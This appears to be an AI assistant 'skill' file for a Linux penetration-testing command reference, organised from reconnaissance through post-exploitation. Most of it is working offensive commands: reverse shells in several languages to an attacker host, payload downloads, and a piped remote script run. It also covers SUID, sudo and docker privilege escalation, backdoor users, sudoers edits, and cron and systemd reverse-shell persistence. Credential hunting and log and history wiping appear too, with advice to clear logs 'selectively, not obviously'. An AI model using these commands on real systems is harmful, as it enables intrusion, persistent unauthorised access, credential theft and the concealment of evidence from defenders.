Practical Linux command reference and techniques for penetration testing operations covering reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation
---
name: linux-pentester-practical-commands
description: Practical Linux command reference and techniques for penetration testing operations covering reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation
triggers:
- how do I use linux commands for pentesting
- show me reconnaissance commands for linux
- what are common privilege escalation techniques on linux
- help me enumerate services on a linux target
- how to perform post exploitation on linux systems
- what commands do pentesters use for linux enumeration
- show me practical linux exploitation commands
- help with linux penetration testing workflow
---
# Linux Pentester Practical Commands
> Skill by [ara.so](https://ara.so) — Security Skills collection.
## Overview
Linux for a Pentester is a curated collection of practical penetration testing commands and techniques organized by engagement phase. This resource provides real-world command-line operations used during security assessments, CTFs, and penetration testing exercises on Linux systems.
The repository is structured around the penetration testing kill chain: reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation.
## Installation
This is a reference repository, not a software package. Clone it for local reference:
```bash
git clone https://github.com/HIMANSHUSHARMA20/Linux-for-a-Pentester.git
cd Linux-for-a-Pentester
```
Keep it accessible during engagements:
```bash
# Add to your path or create an alias
alias pentref='cd ~/tools/Linux-for-a-Pentester && ls'
# Or use it via grep for quick lookups
grep -r "find.*suid" ~/tools/Linux-for-a-Pentester/
```
## Repository Structure
The repository is organized into six main modules:
- **00-General-Commands**: Basic Linux survival commands
- **01-Recon**: Local and network reconnaissance
- **02-Enumeration**: Service and user enumeration
- **03-Exploitation**: Initial access techniques
- **04-Privilege-Escalation**: Escalation to root/admin
- **05-Post-Exploitation**: Persistence and lateral movement
- **Cheatsheets**: Quick reference one-liners
## Key Command Categories
### Reconnaissance Commands
Network and system discovery during initial access:
```bash
# Network interface enumeration
ip addr
ip a show
ifconfig -a
# Routing table inspection
ip route
route -n
netstat -rn
# Active connections and listening ports
ss -tunlp
netstat -tunlp
lsof -i
# ARP cache inspection
ip neigh
arp -a
# DNS enumeration
cat /etc/resolv.conf
cat /etc/hosts
# Firewall rules
iptables -L -n -v
nft list ruleset
# Running processes
ps aux
ps -ef
pstree -p
# System information
uname -a
cat /etc/os-release
lsb_release -a
hostnamectl
```
### Enumeration Techniques
Deep enumeration for privilege escalation vectors:
```bash
# User enumeration
id
whoami
groups
cat /etc/passwd
cat /etc/shadow # if accessible
cat /etc/group
# SUID/SGID binaries
find / -perm -4000 -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null
find / -perm -6000 -type f 2>/dev/null
# Writable directories
find / -writable -type d 2>/dev/null
find / -perm -222 -type d 2>/dev/null
find / -perm -o w -type d 2>/dev/null
# World-writable files
find / -perm -2 -type f 2>/dev/null
# Files owned by current user
find / -user $(whoami) 2>/dev/null
# Sudo permissions
sudo -l
# Capabilities
getcap -r / 2>/dev/null
# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
cat /var/spool/cron/crontabs/*
# Service enumeration
systemctl list-units --type=service
service --status-all
# Listening services with PIDs
ss -tlnp
netstat -tlnp
# Environment variables
env
cat /proc/*/environ 2>/dev/null | tr '\0' '\n'
# Mounted filesystems
mount
cat /etc/fstab
df -h
# SSH keys
find / -name id_rsa 2>/dev/null
find / -name authorized_keys 2>/dev/null
ls -la ~/.ssh/
```
### Exploitation Techniques
Common exploitation patterns during pentests:
```bash
# Reverse shell - Bash
bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1
bash -c 'bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1'
# Reverse shell - Netcat
nc -e /bin/bash $ATTACKER_IP 4444
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER_IP 4444 >/tmp/f
# Reverse shell - Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ATTACKER_IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
# Reverse shell - PHP
php -r '$sock=fsockopen("$ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
# Upgrade to interactive shell
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Then background with Ctrl+Z and run:
# stty raw -echo; fg
# export TERM=xterm
# File transfer - Wget
wget http://$ATTACKER_IP:8000/file -O /tmp/file
# File transfer - Curl
curl http://$ATTACKER_IP:8000/file -o /tmp/file
# File transfer - Base64
echo "base64_encoded_content" | base64 -d > /tmp/file
# Simple HTTP server for exfil
python3 -m http.server 8000
```
### Privilege Escalation Vectors
Common privilege escalation techniques:
```bash
# SUID binary exploitation example - cp
# If cp has SUID bit
/usr/bin/cp /etc/shadow /tmp/shadow.bak
# Then crack or read
# GTFOBins - Find
# If find has SUID
find . -exec /bin/bash -p \; -quit
# Sudo exploitation - less
# If sudo less is allowed
sudo less /etc/profile
# Then type: !/bin/bash
# Sudo exploitation - vim
# If sudo vim is allowed
sudo vim -c ':!/bin/bash'
# Writable /etc/passwd exploitation
openssl passwd -1 -salt xyz password
echo 'hacker:$1$xyz$hash:0:0:root:/root:/bin/bash' >> /etc/passwd
# Path hijacking
echo '/bin/bash' > /tmp/ls
chmod +x /tmp/ls
export PATH=/tmp:$PATH
# LD_PRELOAD exploitation
# Create evil.c
gcc -fPIC -shared -o /tmp/evil.so evil.c -nostartfiles
sudo LD_PRELOAD=/tmp/evil.so program
# Cron job hijacking
# If writable cron script exists
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' >> /path/to/cronjob.sh
# Kernel exploits
uname -a
searchsploit "Linux Kernel $(uname -r | cut -d'-' -f1)"
# Docker escape
# If user in docker group
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# Check for automated enumeration scripts
# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# LinEnum
./LinEnum.sh -t
# Linux Exploit Suggester
./linux-exploit-suggester.sh
```
### Post-Exploitation Activities
Maintaining access and lateral movement:
```bash
# Add SSH key for persistence
mkdir -p /root/.ssh
echo "ssh-rsa YOUR_PUBLIC_KEY" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
# Create backdoor user
useradd -m -s /bin/bash backdoor
echo 'backdoor:password' | chpasswd
usermod -aG sudo backdoor
# Add to sudoers
echo 'backdoor ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers
# Cron persistence
(crontab -l ; echo "@reboot /bin/bash -c 'bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1'") | crontab -
# Service persistence
cat > /etc/systemd/system/backdoor.service << EOF
[Unit]
Description=Backdoor Service
[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1'
Restart=always
[Install]
WantedBy=multi-user.target
EOF
systemctl enable backdoor.service
# Password hash extraction
cat /etc/shadow | grep -v '*' | grep -v '!'
# History clearing
history -c
rm ~/.bash_history
ln -s /dev/null ~/.bash_history
# Log clearing
echo "" > /var/log/auth.log
echo "" > /var/log/syslog
echo "" > ~/.bash_history
# Find interesting files
find / -name "*.conf" 2>/dev/null | grep -v proc
find / -name "*.bak" 2>/dev/null
find / -name "*password*" 2>/dev/null
find / -name "*.db" 2>/dev/null
# Credential hunting
grep -r "password" /etc/ 2>/dev/null
grep -r "PASS" /var/www/ 2>/dev/null
grep -r "DB_PASSWORD" /var/www/ 2>/dev/null
# Network pivoting with SSH
ssh -L 8080:internal_server:80 user@compromised_host
ssh -D 1080 user@compromised_host # SOCKS proxy
# Port forwarding with socat
socat TCP-LISTEN:8080,fork TCP:internal_server:80
```
## Common Patterns
### Initial Foothold Workflow
```bash
# 1. Initial reconnaissance
whoami && id && hostname
uname -a
cat /etc/os-release
# 2. Check sudo permissions
sudo -l
# 3. Find SUID binaries
find / -perm -4000 2>/dev/null
# 4. Check writable files
find / -writable -type f 2>/dev/null | grep -v proc
# 5. Check running services
ps aux
ss -tlnp
# 6. Enumerate users
cat /etc/passwd | grep -v nologin | grep -v false
# 7. Check cron jobs
cat /etc/crontab
ls -la /etc/cron.*
```
### Enumeration Script Pattern
```bash
#!/bin/bash
# Quick enumeration script
echo "[*] System Information"
uname -a
cat /etc/os-release
echo "[*] Current User"
whoami && id
echo "[*] Sudo Permissions"
sudo -l 2>/dev/null
echo "[*] SUID Binaries"
find / -perm -4000 -type f 2>/dev/null
echo "[*] Interesting Files"
find / -name "*.conf" -o -name "*.bak" 2>/dev/null | head -20
echo "[*] Network Connections"
ss -tunlp 2>/dev/null || netstat -tunlp 2>/dev/null
echo "[*] Users with Shell"
cat /etc/passwd | grep -v nologin | grep -v false
```
## Troubleshooting
### Limited Shell Issues
If you have a limited shell, try these escape techniques:
```bash
# Python pty spawn
python -c 'import pty; pty.spawn("/bin/bash")'
# Echo method
echo os.system('/bin/bash')
# Expect spawn
expect -c 'spawn /bin/bash; interact'
# VI escape
vi
:set shell=/bin/bash
:shell
# AWK escape
awk 'BEGIN {system("/bin/bash")}'
```
### Missing Commands
Some systems may have limited binaries. Alternatives:
```bash
# No netcat - use bash
bash -i >& /dev/tcp/$IP/4444 0>&1
# No wget - use curl
curl http://example.com/file -o output
# No curl - use wget
wget http://example.com/file -O output
# No python - use perl
perl -e 'use Socket;$i="$IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```
### File Transfer Issues
When standard methods fail:
```bash
# Base64 encode on attacker, decode on target
cat file | base64 -w 0
# On target:
echo "base64_string" | base64 -d > file
# Using dev/tcp
cat < /dev/tcp/$ATTACKER_IP/80 > file
# Using dd
dd if=/dev/tcp/$ATTACKER_IP/8000 of=/tmp/file
# Using hexdump
xxd -p file | tr -d '\n'
# On target:
echo "hex_string" | xxd -r -p > file
```
## Integration with Pentesting Workflow
This reference is designed to complement automated tools:
```bash
# Run automated enumeration
./linpeas.sh | tee linpeas_output.txt
# Cross-reference with manual commands
grep -i "suid" linpeas_output.txt
# Manually verify findings
find / -perm -4000 2>/dev/null | xargs ls -la
# Test exploitation manually
sudo -l # If linpeas found sudo access
```
## Best Practices
1. **Always stabilize shells immediately** after getting initial access
2. **Document all commands executed** during engagement for reporting
3. **Check multiple enumeration vectors** - automated tools miss things
4. **Verify writable paths** before attempting exploitation
5. **Test privilege escalation** in isolated environment when possible
6. **Clean up artifacts** during post-exploitation phase
7. **Use encryption** for sensitive data exfiltration
8. **Maintain operational security** - clear logs selectively, not obviously
## Reference During Engagement
Quick lookup patterns:
```bash
# Quick SUID check
find / -perm -4000 2>/dev/null | grep -E '(vim|nano|find|nmap|python|perl|ruby|bash)'
# Quick sudo check for common escalation vectors
sudo -l 2>/dev/null | grep -E '(vim|nano|find|nmap|less|more|man|awk|python|perl)'
# Quick writable check
find / -writable 2>/dev/null | grep -E '(\.py$|\.sh$|cron|systemd)' | grep -v proc
```
This skill provides practical, battle-tested Linux commands for penetration testing operations organized by engagement phase.
Creator's repository · aradotso/security-skills